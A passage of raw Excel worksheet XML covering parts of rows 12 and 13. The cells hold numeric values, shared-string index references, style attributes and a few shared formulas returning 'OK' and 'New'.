      <c r="GD12" s="250">
        <v>4</v>
      </c>
      <c r="GE12" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF12" s="505">
        <v>2</v>
      </c>
      <c r="GG12" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH12" s="252">
        <v>2</v>
      </c>
      <c r="GI12" s="253">
        <v>1</v>
      </c>
      <c r="GJ12" s="101">
        <v>67</v>
      </c>
      <c r="GK12" s="102" t="s">
        <v>2583</v>
      </c>
      <c r="GL12" s="102">
        <v>34</v>
      </c>
      <c r="GM12" s="103" t="s">
        <v>2565</v>
      </c>
      <c r="GN12" s="103">
        <v>3</v>
      </c>
      <c r="GO12" s="104">
        <v>33</v>
      </c>
      <c r="GP12" s="105">
        <v>0</v>
      </c>
      <c r="GQ12" s="106">
        <v>0</v>
      </c>
      <c r="GR12" s="497">
        <v>0</v>
      </c>
      <c r="GS12" s="107">
        <v>0</v>
      </c>
      <c r="GT12" s="107">
        <v>0</v>
      </c>
      <c r="GU12" s="108">
        <v>0</v>
      </c>
      <c r="GV12" s="109">
        <v>0</v>
      </c>
      <c r="GW12" s="110">
        <v>0</v>
      </c>
      <c r="GX12" s="501">
        <v>0</v>
      </c>
      <c r="GY12" s="111">
        <v>0</v>
      </c>
      <c r="GZ12" s="111">
        <v>0</v>
      </c>
      <c r="HA12" s="112">
        <v>0</v>
      </c>
      <c r="HB12" s="113">
        <v>63</v>
      </c>
      <c r="HC12" s="114" t="s">
        <v>1795</v>
      </c>
      <c r="HD12" s="503">
        <v>32</v>
      </c>
      <c r="HE12" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF12" s="115">
        <v>1</v>
      </c>
      <c r="HG12" s="116">
        <v>32</v>
      </c>
      <c r="HH12" s="101">
        <v>0</v>
      </c>
      <c r="HI12" s="102">
        <v>0</v>
      </c>
      <c r="HJ12" s="102">
        <v>0</v>
      </c>
      <c r="HK12" s="103">
        <v>0</v>
      </c>
      <c r="HL12" s="103">
        <v>0</v>
      </c>
      <c r="HM12" s="104">
        <v>0</v>
      </c>
      <c r="HN12" s="105">
        <v>0</v>
      </c>
      <c r="HO12" s="106">
        <v>0</v>
      </c>
      <c r="HP12" s="497">
        <v>0</v>
      </c>
      <c r="HQ12" s="107">
        <v>0</v>
      </c>
      <c r="HR12" s="107">
        <v>0</v>
      </c>
      <c r="HS12" s="108">
        <v>0</v>
      </c>
      <c r="HT12" s="109">
        <v>0</v>
      </c>
      <c r="HU12" s="110">
        <v>0</v>
      </c>
      <c r="HV12" s="501">
        <v>0</v>
      </c>
      <c r="HW12" s="111">
        <v>0</v>
      </c>
      <c r="HX12" s="111">
        <v>0</v>
      </c>
      <c r="HY12" s="112">
        <v>0</v>
      </c>
      <c r="HZ12" s="113">
        <v>0</v>
      </c>
      <c r="IA12" s="114">
        <v>0</v>
      </c>
      <c r="IB12" s="503">
        <v>0</v>
      </c>
      <c r="IC12" s="115">
        <v>0</v>
      </c>
      <c r="ID12" s="115">
        <v>0</v>
      </c>
      <c r="IE12" s="116">
        <v>0</v>
      </c>
      <c r="IF12" s="250">
        <v>93</v>
      </c>
      <c r="IG12" s="251" t="s">
        <v>2584</v>
      </c>
      <c r="IH12" s="505">
        <v>93</v>
      </c>
      <c r="II12" s="252" t="s">
        <v>2585</v>
      </c>
      <c r="IJ12" s="252">
        <v>3</v>
      </c>
      <c r="IK12" s="253">
        <v>31</v>
      </c>
      <c r="IL12" s="101">
        <v>93</v>
      </c>
      <c r="IM12" s="102" t="s">
        <v>2584</v>
      </c>
      <c r="IN12" s="102">
        <v>93</v>
      </c>
      <c r="IO12" s="103" t="s">
        <v>2585</v>
      </c>
      <c r="IP12" s="103">
        <v>3</v>
      </c>
      <c r="IQ12" s="104">
        <v>31</v>
      </c>
      <c r="IR12" s="105">
        <v>0</v>
      </c>
      <c r="IS12" s="106">
        <v>0</v>
      </c>
      <c r="IT12" s="497">
        <v>0</v>
      </c>
      <c r="IU12" s="107">
        <v>0</v>
      </c>
      <c r="IV12" s="107">
        <v>0</v>
      </c>
      <c r="IW12" s="108">
        <v>0</v>
      </c>
      <c r="IX12" s="109">
        <v>0</v>
      </c>
      <c r="IY12" s="110">
        <v>0</v>
      </c>
      <c r="IZ12" s="501">
        <v>0</v>
      </c>
      <c r="JA12" s="111">
        <v>0</v>
      </c>
      <c r="JB12" s="111">
        <v>0</v>
      </c>
      <c r="JC12" s="112">
        <v>0</v>
      </c>
      <c r="JD12" s="113">
        <v>0</v>
      </c>
      <c r="JE12" s="114">
        <v>0</v>
      </c>
      <c r="JF12" s="503">
        <v>0</v>
      </c>
      <c r="JG12" s="115">
        <v>0</v>
      </c>
      <c r="JH12" s="115">
        <v>0</v>
      </c>
      <c r="JI12" s="116">
        <v>0</v>
      </c>
      <c r="JJ12" s="101">
        <v>0</v>
      </c>
      <c r="JK12" s="102">
        <v>0</v>
      </c>
      <c r="JL12" s="102">
        <v>0</v>
      </c>
      <c r="JM12" s="103">
        <v>0</v>
      </c>
      <c r="JN12" s="103">
        <v>0</v>
      </c>
      <c r="JO12" s="104">
        <v>0</v>
      </c>
      <c r="JP12" s="105">
        <v>0</v>
      </c>
      <c r="JQ12" s="106">
        <v>0</v>
      </c>
      <c r="JR12" s="497">
        <v>0</v>
      </c>
      <c r="JS12" s="107">
        <v>0</v>
      </c>
      <c r="JT12" s="107">
        <v>0</v>
      </c>
      <c r="JU12" s="108">
        <v>0</v>
      </c>
      <c r="JV12" s="109">
        <v>0</v>
      </c>
      <c r="JW12" s="110">
        <v>0</v>
      </c>
      <c r="JX12" s="501">
        <v>0</v>
      </c>
      <c r="JY12" s="111">
        <v>0</v>
      </c>
      <c r="JZ12" s="111">
        <v>0</v>
      </c>
      <c r="KA12" s="112">
        <v>0</v>
      </c>
      <c r="KB12" s="113">
        <v>0</v>
      </c>
      <c r="KC12" s="114">
        <v>0</v>
      </c>
      <c r="KD12" s="503">
        <v>0</v>
      </c>
      <c r="KE12" s="115">
        <v>0</v>
      </c>
      <c r="KF12" s="115">
        <v>0</v>
      </c>
      <c r="KG12" s="116">
        <v>0</v>
      </c>
      <c r="KH12" s="250">
        <v>0</v>
      </c>
      <c r="KI12" s="251">
        <v>0</v>
      </c>
      <c r="KJ12" s="505">
        <v>0</v>
      </c>
      <c r="KK12" s="252">
        <v>0</v>
      </c>
      <c r="KL12" s="252">
        <v>0</v>
      </c>
      <c r="KM12" s="253">
        <v>0</v>
      </c>
      <c r="KN12" s="101">
        <v>0</v>
      </c>
      <c r="KO12" s="102">
        <v>0</v>
      </c>
      <c r="KP12" s="102">
        <v>0</v>
      </c>
      <c r="KQ12" s="103">
        <v>0</v>
      </c>
      <c r="KR12" s="103">
        <v>0</v>
      </c>
      <c r="KS12" s="104">
        <v>0</v>
      </c>
      <c r="KT12" s="105">
        <v>0</v>
      </c>
      <c r="KU12" s="106">
        <v>0</v>
      </c>
      <c r="KV12" s="497">
        <v>0</v>
      </c>
      <c r="KW12" s="107">
        <v>0</v>
      </c>
      <c r="KX12" s="107">
        <v>0</v>
      </c>
      <c r="KY12" s="108">
        <v>0</v>
      </c>
      <c r="KZ12" s="109">
        <v>0</v>
      </c>
      <c r="LA12" s="110">
        <v>0</v>
      </c>
      <c r="LB12" s="501">
        <v>0</v>
      </c>
      <c r="LC12" s="111">
        <v>0</v>
      </c>
      <c r="LD12" s="111">
        <v>0</v>
      </c>
      <c r="LE12" s="112">
        <v>0</v>
      </c>
      <c r="LF12" s="113">
        <v>0</v>
      </c>
      <c r="LG12" s="114">
        <v>0</v>
      </c>
      <c r="LH12" s="503">
        <v>0</v>
      </c>
      <c r="LI12" s="115">
        <v>0</v>
      </c>
      <c r="LJ12" s="115">
        <v>0</v>
      </c>
      <c r="LK12" s="116">
        <v>0</v>
      </c>
      <c r="LL12" s="117">
        <v>62</v>
      </c>
      <c r="LM12" s="507">
        <v>33</v>
      </c>
      <c r="LN12" s="119">
        <v>2</v>
      </c>
      <c r="LO12" s="119">
        <v>3</v>
      </c>
      <c r="LP12" s="119">
        <v>33</v>
      </c>
      <c r="LQ12" s="119">
        <v>5</v>
      </c>
      <c r="LR12" s="119">
        <v>28</v>
      </c>
      <c r="LS12" s="119">
        <v>33</v>
      </c>
      <c r="LT12" s="382"/>
      <c r="LU12" s="117">
        <v>0</v>
      </c>
      <c r="LV12" s="118">
        <v>0</v>
      </c>
      <c r="LW12" s="507">
        <v>0</v>
      </c>
      <c r="LX12" s="119">
        <v>0</v>
      </c>
      <c r="LY12" s="119">
        <v>0</v>
      </c>
      <c r="LZ12" s="119">
        <v>0</v>
      </c>
      <c r="MA12" s="117">
        <v>0</v>
      </c>
      <c r="MB12" s="118">
        <v>0</v>
      </c>
      <c r="MC12" s="507">
        <v>0</v>
      </c>
      <c r="MD12" s="119">
        <v>0</v>
      </c>
      <c r="ME12" s="119">
        <v>0</v>
      </c>
      <c r="MF12" s="119">
        <v>0</v>
      </c>
      <c r="MG12" s="117">
        <v>0</v>
      </c>
      <c r="MH12" s="118">
        <v>0</v>
      </c>
      <c r="MI12" s="507">
        <v>0</v>
      </c>
      <c r="MJ12" s="119">
        <v>0</v>
      </c>
      <c r="MK12" s="119">
        <v>0</v>
      </c>
      <c r="ML12" s="119">
        <v>0</v>
      </c>
      <c r="MM12" s="117">
        <v>0</v>
      </c>
      <c r="MN12" s="118">
        <v>0</v>
      </c>
      <c r="MO12" s="507">
        <v>0</v>
      </c>
      <c r="MP12" s="119">
        <v>0</v>
      </c>
      <c r="MQ12" s="119">
        <v>0</v>
      </c>
      <c r="MR12" s="119">
        <v>0</v>
      </c>
      <c r="MS12" s="117">
        <v>9</v>
      </c>
      <c r="MT12" s="118" t="s">
        <v>4164</v>
      </c>
      <c r="MU12" s="507">
        <v>5</v>
      </c>
      <c r="MV12" s="119" t="s">
        <v>4165</v>
      </c>
      <c r="MW12" s="119">
        <v>2</v>
      </c>
      <c r="MX12" s="119">
        <v>5</v>
      </c>
      <c r="MY12" s="117">
        <v>0</v>
      </c>
      <c r="MZ12" s="118">
        <v>0</v>
      </c>
      <c r="NA12" s="507">
        <v>0</v>
      </c>
      <c r="NB12" s="119">
        <v>0</v>
      </c>
      <c r="NC12" s="119">
        <v>0</v>
      </c>
      <c r="ND12" s="119">
        <v>0</v>
      </c>
      <c r="NE12" s="117">
        <v>0</v>
      </c>
      <c r="NF12" s="118">
        <v>0</v>
      </c>
      <c r="NG12" s="507">
        <v>0</v>
      </c>
      <c r="NH12" s="119">
        <v>0</v>
      </c>
      <c r="NI12" s="119">
        <v>0</v>
      </c>
      <c r="NJ12" s="119">
        <v>0</v>
      </c>
      <c r="NK12" s="117">
        <v>0</v>
      </c>
      <c r="NL12" s="118">
        <v>0</v>
      </c>
      <c r="NM12" s="507">
        <v>0</v>
      </c>
      <c r="NN12" s="119">
        <v>0</v>
      </c>
      <c r="NO12" s="119">
        <v>0</v>
      </c>
      <c r="NP12" s="119">
        <v>0</v>
      </c>
      <c r="NQ12" s="117">
        <v>0</v>
      </c>
      <c r="NR12" s="118">
        <v>0</v>
      </c>
      <c r="NS12" s="507">
        <v>0</v>
      </c>
      <c r="NT12" s="119">
        <v>0</v>
      </c>
      <c r="NU12" s="119">
        <v>0</v>
      </c>
      <c r="NV12" s="119">
        <v>0</v>
      </c>
      <c r="NW12" s="117">
        <v>53</v>
      </c>
      <c r="NX12" s="118" t="s">
        <v>4322</v>
      </c>
      <c r="NY12" s="507">
        <v>28</v>
      </c>
      <c r="NZ12" s="119" t="s">
        <v>4323</v>
      </c>
      <c r="OA12" s="119">
        <v>3</v>
      </c>
      <c r="OB12" s="119">
        <v>28</v>
      </c>
      <c r="OC12" s="120">
        <v>0</v>
      </c>
      <c r="OD12" s="120">
        <v>0</v>
      </c>
      <c r="OE12" s="120">
        <v>0</v>
      </c>
      <c r="OF12" s="120">
        <v>0</v>
      </c>
      <c r="OG12" s="120">
        <v>0</v>
      </c>
      <c r="OH12" s="120">
        <v>0</v>
      </c>
      <c r="OI12" s="120">
        <v>0</v>
      </c>
      <c r="OJ12" s="120">
        <v>0</v>
      </c>
      <c r="OK12" s="383"/>
      <c r="OL12" s="120">
        <v>0</v>
      </c>
      <c r="OM12" s="120">
        <v>0</v>
      </c>
      <c r="ON12" s="120">
        <v>0</v>
      </c>
      <c r="OO12" s="120"/>
      <c r="OP12" s="120">
        <v>0</v>
      </c>
      <c r="OQ12" s="464">
        <v>0</v>
      </c>
      <c r="OR12" s="120">
        <v>0</v>
      </c>
      <c r="OS12" s="120">
        <v>0</v>
      </c>
      <c r="OT12" s="120">
        <v>0</v>
      </c>
      <c r="OU12" s="120"/>
      <c r="OV12" s="120">
        <v>0</v>
      </c>
      <c r="OW12" s="464">
        <v>0</v>
      </c>
      <c r="OX12" s="120">
        <v>0</v>
      </c>
      <c r="OY12" s="120">
        <v>0</v>
      </c>
      <c r="OZ12" s="120">
        <v>0</v>
      </c>
      <c r="PA12" s="120"/>
      <c r="PB12" s="120">
        <v>0</v>
      </c>
      <c r="PC12" s="464">
        <v>0</v>
      </c>
      <c r="PD12" s="120">
        <v>0</v>
      </c>
      <c r="PE12" s="120">
        <v>0</v>
      </c>
      <c r="PF12" s="120">
        <v>0</v>
      </c>
      <c r="PG12" s="120"/>
      <c r="PH12" s="120">
        <v>0</v>
      </c>
      <c r="PI12" s="464">
        <v>0</v>
      </c>
      <c r="PJ12" s="120">
        <v>0</v>
      </c>
      <c r="PK12" s="120">
        <v>0</v>
      </c>
      <c r="PL12" s="120">
        <v>0</v>
      </c>
      <c r="PM12" s="120"/>
      <c r="PN12" s="120">
        <v>0</v>
      </c>
      <c r="PO12" s="464">
        <v>0</v>
      </c>
      <c r="PP12" s="120">
        <v>0</v>
      </c>
      <c r="PQ12" s="120">
        <v>0</v>
      </c>
      <c r="PR12" s="120">
        <v>0</v>
      </c>
      <c r="PS12" s="120"/>
      <c r="PT12" s="120">
        <v>0</v>
      </c>
      <c r="PU12" s="464">
        <v>0</v>
      </c>
      <c r="PV12" s="120">
        <v>0</v>
      </c>
      <c r="PW12" s="120">
        <v>0</v>
      </c>
      <c r="PX12" s="120">
        <v>0</v>
      </c>
      <c r="PY12" s="120"/>
      <c r="PZ12" s="120">
        <v>0</v>
      </c>
      <c r="QA12" s="464">
        <v>0</v>
      </c>
      <c r="QB12" s="120">
        <v>0</v>
      </c>
      <c r="QC12" s="120">
        <v>0</v>
      </c>
      <c r="QD12" s="120">
        <v>0</v>
      </c>
      <c r="QE12" s="120"/>
      <c r="QF12" s="120">
        <v>0</v>
      </c>
      <c r="QG12" s="464">
        <v>0</v>
      </c>
      <c r="QH12" s="120">
        <v>0</v>
      </c>
      <c r="QI12" s="120">
        <v>0</v>
      </c>
      <c r="QJ12" s="120">
        <v>0</v>
      </c>
      <c r="QK12" s="120"/>
      <c r="QL12" s="120">
        <v>0</v>
      </c>
      <c r="QM12" s="464">
        <v>0</v>
      </c>
      <c r="QN12" s="120">
        <v>0</v>
      </c>
      <c r="QO12" s="120">
        <v>0</v>
      </c>
      <c r="QP12" s="120">
        <v>0</v>
      </c>
      <c r="QQ12" s="120"/>
      <c r="QR12" s="120">
        <v>0</v>
      </c>
      <c r="QS12" s="464">
        <v>0</v>
      </c>
      <c r="QT12" s="184"/>
      <c r="QU12" s="184"/>
      <c r="QV12" s="184"/>
      <c r="QW12" s="184"/>
      <c r="QX12" s="184"/>
      <c r="QY12" s="184"/>
      <c r="QZ12" s="184"/>
      <c r="RA12" s="184"/>
      <c r="RB12" s="184"/>
      <c r="RC12" s="184"/>
      <c r="RD12" s="184"/>
      <c r="RE12" s="184"/>
      <c r="RF12" s="184"/>
      <c r="RG12" s="184"/>
      <c r="RH12" s="184"/>
      <c r="RI12" s="184"/>
      <c r="RJ12" s="184"/>
      <c r="RK12" s="184"/>
      <c r="RL12" s="184"/>
      <c r="RM12" s="184"/>
      <c r="RN12" s="184"/>
      <c r="RO12" s="184"/>
      <c r="RP12" s="184"/>
      <c r="RQ12" s="184"/>
      <c r="RR12" s="184"/>
      <c r="RS12" s="184"/>
      <c r="RT12" s="184"/>
      <c r="RU12" s="184"/>
      <c r="RV12" s="184"/>
      <c r="RW12" s="184"/>
      <c r="RX12" s="184"/>
      <c r="RY12" s="184"/>
      <c r="RZ12" s="184"/>
      <c r="SA12" s="184"/>
      <c r="SB12" s="184"/>
      <c r="SC12" s="184"/>
      <c r="SD12" s="184"/>
      <c r="SE12" s="184"/>
      <c r="SF12" s="184"/>
      <c r="SG12" s="184"/>
      <c r="SH12" s="184"/>
      <c r="SI12" s="184"/>
      <c r="SJ12" s="184"/>
      <c r="SK12" s="184"/>
      <c r="SL12" s="184"/>
      <c r="SM12" s="184"/>
      <c r="SN12" s="184"/>
      <c r="SO12" s="184"/>
      <c r="SP12" s="184"/>
      <c r="SQ12" s="184"/>
      <c r="SR12" s="184"/>
      <c r="SS12" s="184"/>
      <c r="ST12" s="184"/>
      <c r="SU12" s="184"/>
      <c r="SV12" s="184"/>
      <c r="SW12" s="184"/>
      <c r="SX12" s="184"/>
      <c r="SY12" s="184"/>
      <c r="SZ12" s="184"/>
      <c r="TA12" s="184"/>
      <c r="TB12" s="184"/>
      <c r="TC12" s="184"/>
      <c r="TD12" s="184"/>
      <c r="TE12" s="184"/>
      <c r="TF12" s="184"/>
      <c r="TG12" s="184"/>
      <c r="TH12" s="184"/>
      <c r="TI12" s="184"/>
      <c r="TJ12" s="184"/>
      <c r="TK12" s="184"/>
      <c r="TL12" s="184"/>
      <c r="TM12" s="184"/>
      <c r="TN12" s="184"/>
      <c r="TO12" s="184"/>
      <c r="TP12" s="184"/>
      <c r="TQ12" s="184"/>
      <c r="TR12" s="184"/>
      <c r="TS12" s="184"/>
      <c r="TT12" s="184"/>
      <c r="TU12" s="184"/>
      <c r="TV12" s="184"/>
      <c r="TW12" s="184"/>
      <c r="TX12" s="184"/>
      <c r="TY12" s="184"/>
      <c r="TZ12" s="184"/>
      <c r="UA12" s="184"/>
      <c r="UB12" s="184"/>
      <c r="UC12" s="184"/>
      <c r="UD12" s="184"/>
      <c r="UE12" s="184"/>
      <c r="UF12" s="184"/>
      <c r="UG12" s="184"/>
      <c r="UH12" s="184"/>
      <c r="UI12" s="184"/>
      <c r="UJ12" s="184"/>
      <c r="UK12" s="184"/>
      <c r="UL12" s="184"/>
      <c r="UM12" s="184"/>
      <c r="UN12" s="184"/>
      <c r="UO12" s="184"/>
      <c r="UP12" s="184"/>
      <c r="UQ12" s="184"/>
      <c r="UR12" s="184"/>
      <c r="US12" s="184"/>
      <c r="UT12" s="184"/>
      <c r="UU12" s="184"/>
      <c r="UV12" s="184"/>
      <c r="UW12" s="184"/>
      <c r="UX12" s="184"/>
      <c r="UY12" s="184"/>
      <c r="UZ12" s="184"/>
      <c r="VA12" s="184"/>
      <c r="VB12" s="184"/>
      <c r="VC12" s="184"/>
      <c r="VD12" s="184"/>
      <c r="VE12" s="184"/>
      <c r="VF12" s="184"/>
      <c r="VG12" s="184"/>
      <c r="VH12" s="184"/>
      <c r="VI12" s="184"/>
      <c r="VJ12" s="184"/>
      <c r="VK12" s="184"/>
      <c r="VL12" s="184"/>
      <c r="VM12" s="184"/>
      <c r="VN12" s="184"/>
      <c r="VO12" s="184"/>
      <c r="VP12" s="184"/>
      <c r="VQ12" s="184"/>
      <c r="VR12" s="184"/>
      <c r="VS12" s="184"/>
      <c r="VT12" s="184"/>
      <c r="VU12" s="184"/>
      <c r="VV12" s="184"/>
      <c r="VW12" s="184"/>
      <c r="VX12" s="184"/>
      <c r="VY12" s="184"/>
    </row>
    <row r="13" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A13" s="82" t="s">
        <v>17</v>
      </c>
      <c r="B13" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C13" s="83" t="s">
        <v>315</v>
      </c>
      <c r="D13" s="83" t="s">
        <v>851</v>
      </c>
      <c r="E13" s="83">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="F13" s="83" t="s">
        <v>29</v>
      </c>
      <c r="G13" s="94" t="s">
        <v>4</v>
      </c>
      <c r="H13" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I13" s="81" t="s">
        <v>852</v>
      </c>
      <c r="J13" s="85" t="s">
        <v>772</v>
      </c>
      <c r="K13" s="81" t="s">
        <v>853</v>
      </c>
      <c r="L13" s="81" t="s">
        <v>854</v>
      </c>
      <c r="M13" s="378" t="s">
        <v>189</v>
      </c>
      <c r="N13" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O13" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P13" s="91"/>
      <c r="Q13" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R13" s="92" t="s">
        <v>855</v>
      </c>
      <c r="S13" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T13" s="92" t="s">
        <v>856</v>
      </c>
      <c r="U13" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V13" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W13" s="96" t="s">
        <v>857</v>
      </c>
      <c r="X13" s="97" t="s">
        <v>858</v>
      </c>
      <c r="Y13" s="83" t="s">
        <v>859</v>
      </c>
      <c r="Z13" s="98" t="s">
        <v>860</v>
      </c>
      <c r="AA13" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB13" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC13" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD13" s="83"/>
      <c r="AE13" s="83"/>
      <c r="AF13" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG13" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH13" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI13" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ13" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK13" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL13" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM13" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN13" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO13" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP13" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ13" s="358">
        <v>13</v>
      </c>
      <c r="AR13" s="100"/>
      <c r="AS13" s="100">
        <v>1</v>
      </c>
      <c r="AT13" s="100">
        <v>0</v>
      </c>
      <c r="AU13" s="100">
        <v>1</v>
      </c>
      <c r="AV13" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW13" s="100">
        <v>1</v>
      </c>
      <c r="AX13" s="100">
        <v>1</v>
      </c>
      <c r="AY13" s="100">
        <v>0</v>
      </c>
      <c r="AZ13" s="100">
        <v>1</v>
      </c>
      <c r="BA13" s="381"/>
      <c r="BB13" s="101">
        <v>0</v>
      </c>
      <c r="BC13" s="102">
        <v>0</v>
      </c>
      <c r="BD13" s="102">
        <v>0</v>
      </c>
      <c r="BE13" s="103">
        <v>0</v>
      </c>
      <c r="BF13" s="103">
        <v>0</v>
      </c>
      <c r="BG13" s="104">
        <v>0</v>
      </c>
      <c r="BH13" s="105">
        <v>0</v>
      </c>
      <c r="BI13" s="106">
        <v>0</v>
      </c>
      <c r="BJ13" s="497">
        <v>0</v>
      </c>
      <c r="BK13" s="107">
        <v>0</v>
      </c>
      <c r="BL13" s="107">
        <v>0</v>
      </c>
      <c r="BM13" s="108">
        <v>0</v>
      </c>
      <c r="BN13" s="109">
        <v>0</v>
      </c>
      <c r="BO13" s="110">
        <v>0</v>
      </c>
      <c r="BP13" s="501">
        <v>0</v>
      </c>
      <c r="BQ13" s="111">
        <v>0</v>
      </c>
      <c r="BR13" s="111">
        <v>0</v>
      </c>
      <c r="BS13" s="112">
        <v>0</v>
      </c>
      <c r="BT13" s="113">
        <v>5</v>
      </c>
      <c r="BU13" s="114" t="s">
        <v>2588</v>
      </c>
      <c r="BV13" s="503">
        <v>2</v>
      </c>
      <c r="BW13" s="115" t="s">
        <v>2589</v>
      </c>
      <c r="BX13" s="115">
        <v>2</v>
      </c>
      <c r="BY13" s="116">
        <v>1</v>
      </c>
      <c r="BZ13" s="250">
        <v>25</v>
      </c>
      <c r="CA13" s="251" t="s">
        <v>2590</v>
      </c>
      <c r="CB13" s="505">
        <v>17</v>
      </c>
      <c r="CC13" s="252" t="s">
        <v>2591</v>
      </c>
      <c r="CD13" s="252">
        <v>17</v>
      </c>
      <c r="CE13" s="253">
        <v>2</v>
      </c>
      <c r="CF13" s="101">
        <v>30</v>
      </c>
      <c r="CG13" s="102" t="s">
        <v>2592</v>
      </c>
      <c r="CH13" s="102">
        <v>19</v>
      </c>
      <c r="CI13" s="103" t="s">
        <v>2593</v>
      </c>
      <c r="CJ13" s="103">
        <v>19</v>
      </c>
      <c r="CK13" s="104">
        <v>2</v>
      </c>
      <c r="CL13" s="105">
        <v>0</v>
      </c>
      <c r="CM13" s="106">
        <v>0</v>
      </c>
      <c r="CN13" s="497">
        <v>0</v>
      </c>
      <c r="CO13" s="107">
        <v>0</v>
      </c>
      <c r="CP13" s="107">
        <v>0</v>
      </c>
      <c r="CQ13" s="108">
        <v>0</v>
      </c>
      <c r="CR13" s="109">
        <v>0</v>
      </c>
      <c r="CS13" s="110">
        <v>0</v>
      </c>
      <c r="CT13" s="501">
        <v>0</v>
      </c>
      <c r="CU13" s="111">
        <v>0</v>
      </c>
      <c r="CV13" s="111">
        <v>0</v>
      </c>
      <c r="CW13" s="112">
        <v>0</v>
      </c>
      <c r="CX13" s="113">
        <v>0</v>
      </c>
      <c r="CY13" s="114">
        <v>0</v>
      </c>
      <c r="CZ13" s="503">
        <v>0</v>
      </c>
      <c r="DA13" s="115">
        <v>0</v>
      </c>
      <c r="DB13" s="115">
        <v>0</v>
      </c>
      <c r="DC13" s="116">
        <v>0</v>
      </c>
      <c r="DD13" s="101">
        <v>0</v>
      </c>
      <c r="DE13" s="102">
        <v>0</v>
      </c>
      <c r="DF13" s="102">
        <v>0</v>
      </c>
      <c r="DG13" s="103">
        <v>0</v>
      </c>
      <c r="DH13" s="103">
        <v>0</v>
      </c>
      <c r="DI13" s="104">
        <v>0</v>
      </c>
      <c r="DJ13" s="105">
        <v>0</v>
      </c>
      <c r="DK13" s="106">
        <v>0</v>
      </c>
      <c r="DL13" s="497">
        <v>0</v>
      </c>
      <c r="DM13" s="107">
        <v>0</v>
      </c>
      <c r="DN13" s="107">
        <v>0</v>
      </c>
      <c r="DO13" s="108">
        <v>0</v>
      </c>
      <c r="DP13" s="109">
        <v>0</v>
      </c>
      <c r="DQ13" s="110">
        <v>0</v>
      </c>
      <c r="DR13" s="501">
        <v>0</v>
      </c>
      <c r="DS13" s="111">
        <v>0</v>
      </c>
      <c r="DT13" s="111">
        <v>0</v>
      </c>
      <c r="DU13" s="112">
        <v>0</v>
      </c>
      <c r="DV13" s="113">
        <v>1</v>
      </c>
      <c r="DW13" s="114" t="s">
        <v>2594</v>
      </c>
      <c r="DX13" s="503">
        <v>1</v>
      </c>
      <c r="DY13" s="115" t="s">
        <v>2595</v>
      </c>
      <c r="DZ13" s="115">
        <v>1</v>
      </c>
      <c r="EA13" s="116">
        <v>1</v>
      </c>
      <c r="EB13" s="250">
        <v>0</v>
      </c>
      <c r="EC13" s="251">
        <v>0</v>
      </c>
      <c r="ED13" s="505">
        <v>0</v>
      </c>
      <c r="EE13" s="252">
        <v>0</v>
      </c>
      <c r="EF13" s="252">
        <v>0</v>
      </c>
      <c r="EG13" s="253">
        <v>0</v>
      </c>
      <c r="EH13" s="101">
        <v>1</v>
      </c>
      <c r="EI13" s="102" t="s">
        <v>2594</v>
      </c>
      <c r="EJ13" s="102">
        <v>1</v>
      </c>
      <c r="EK13" s="103" t="s">
        <v>2595</v>
      </c>
      <c r="EL13" s="103">
        <v>1</v>
      </c>
      <c r="EM13" s="104">
        <v>1</v>
      </c>
      <c r="EN13" s="105">
        <v>0</v>
      </c>
      <c r="EO13" s="106">
        <v>0</v>
      </c>
      <c r="EP13" s="497">
        <v>0</v>
      </c>
      <c r="EQ13" s="107">
        <v>0</v>
      </c>
      <c r="ER13" s="107">
        <v>0</v>
      </c>
      <c r="ES13" s="108">
        <v>0</v>
      </c>
      <c r="ET13" s="109">
        <v>0</v>
      </c>
      <c r="EU13" s="110">
        <v>0</v>
      </c>
      <c r="EV13" s="501">
        <v>0</v>
      </c>
      <c r="EW13" s="111">
        <v>0</v>
      </c>
      <c r="EX13" s="111">
        <v>0</v>
      </c>
      <c r="EY13" s="112">
        <v>0</v>
      </c>
      <c r="EZ13" s="113">
        <v>0</v>
      </c>
      <c r="FA13" s="114">
        <v>0</v>
      </c>
      <c r="FB13" s="503">
        <v>0</v>
      </c>
      <c r="FC13" s="115">
        <v>0</v>
      </c>
      <c r="FD13" s="115">
        <v>0</v>
      </c>
      <c r="FE13" s="116">
        <v>0</v>
      </c>
      <c r="FF13" s="101">
        <v>0</v>
      </c>
      <c r="FG13" s="102">
        <v>0</v>
      </c>
      <c r="FH13" s="102">
        <v>0</v>
      </c>
      <c r="FI13" s="103">
        <v>0</v>
      </c>
      <c r="FJ13" s="103">
        <v>0</v>
      </c>
      <c r="FK13" s="104">
        <v>0</v>
      </c>
      <c r="FL13" s="105">
        <v>0</v>
      </c>
      <c r="FM13" s="106">
        <v>0</v>
      </c>
      <c r="FN13" s="497">
        <v>0</v>
      </c>
      <c r="FO13" s="107">
        <v>0</v>
      </c>
      <c r="FP13" s="107">
        <v>0</v>
      </c>
      <c r="FQ13" s="108">
        <v>0</v>
      </c>
      <c r="FR13" s="109">
        <v>0</v>
      </c>
      <c r="FS13" s="110">
        <v>0</v>
      </c>
